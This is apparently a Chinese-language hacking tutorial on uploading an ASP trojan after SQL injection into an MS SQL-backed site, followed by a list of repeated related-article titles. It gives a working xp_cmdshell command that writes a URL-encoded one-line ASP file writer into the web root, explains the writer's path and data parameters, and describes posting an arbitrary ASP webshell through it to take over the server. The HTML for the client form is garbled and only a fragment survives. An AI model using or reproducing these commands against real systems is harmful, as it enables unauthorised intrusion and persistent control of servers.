SQL注入木馬

sql注入後，如何上傳木馬，一直是比較頭疼的事，我這裡提供上傳木馬的一種另一種方法。

1、sql注入的時候，用xp_cmdshell 向伺服器上寫入乙個能寫檔案的asp檔案。

檔案內容：

set objfso = server.createobject("scripting.filesystemobject")

set objcountfile=objfso.createtextfile(request("mypath"),true)

objcountfile.write request("mydata")

objcountfile.close

這個檔案可以寫成一行 <%set objfso = server.createobject("scripting.filesystemobject"):set objcountfile=objfso.createtextfile(request("mypath"),true):objcountfile.write request("mydata"):objcountfile.close%>

將特殊字元進行編碼就可以得到 %3c%25set%20objfso%20=%20server.createobject(%22scripting.filesystemobject%22):set%20objcountfile=objfso.createtextfile(request(%22mypath%22),true):objcountfile.write%20request(%22mydata%22):objcountfile.close%25%3e

注入（這裡假定web目錄是c:/inetpub/root/）：

exec master..xp_cmdshell 'echo "%3c%25set%20objfso%20=%20server.createobject(%22scripting.filesystemobject%22):set%20objcountfile=objfso.createtextfile(request(%22mypath%22),true):objcountfile.write%20request(%22mydata%22):objcountfile.close%25%3e" > c:/inetpub/root/ftp.asp';

這樣在伺服器的web 目錄下將生成乙個 ftp.asp檔案

該檔案的**為

set objfso = server.createobject("scripting.filesystemobject")

set objcountfile=objfso.createtextfile(request("mypath"),true)

objcountfile.write request("mydata")

objcountfile.close

你可以看到，上面**中預留了兩個介面 mypath 和 mydata

mypath是下次提交的時候檔案的生成路徑

mydata是檔案的內容

在本地編寫乙個客戶端檔案例：rohuclient.htm **如下

";>虎盟）

在目標位置欄填上剛剛生成的ftp.asp檔案的url位址

如 http://127.0.0.1/ftp.asp

（這裡假設伺服器的ip是 127.0.0.1）

在生成檔案欄輸入將在伺服器上生成的檔名比如：c:/inetpub/root/server.asp

在檔案內容裡，隨意的貼上乙個asp**

點遞交，當

檔案執行完畢基本上伺服器上的asp木馬就生成了。

瀏覽 http://127.0.0.1/server.asp

呵呵伺服器就是你的了。

SQL注入木馬

SQL注入與ASP木馬上傳

SQL注入與ASP木馬上傳

SQL資料庫表防JS木馬注入

SQL注入木馬

SQL注入與ASP木馬上傳

SQL注入與ASP木馬上傳

SQL資料庫表防JS木馬注入

相關推薦